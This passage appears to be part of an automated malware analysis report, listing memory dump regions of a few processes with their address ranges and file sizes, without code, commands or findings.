                                                                                                                                                                                                                                                        9.1MB

                                                                                                                                                                                                                                                      • memory/4864-142-0x0000000002A80000-0x0000000002E81000-memory.dmp

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4.0MB

                                                                                                                                                                                                                                                      • memory/4868-296-0x000001A6D8330000-0x000001A6D8342000-memory.dmp

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                                      • memory/4868-367-0x00007FFE1D830000-0x00007FFE1E2F1000-memory.dmp

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                                                      • memory/4868-297-0x000001A6D8190000-0x000001A6D819A000-memory.dmp

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        40KB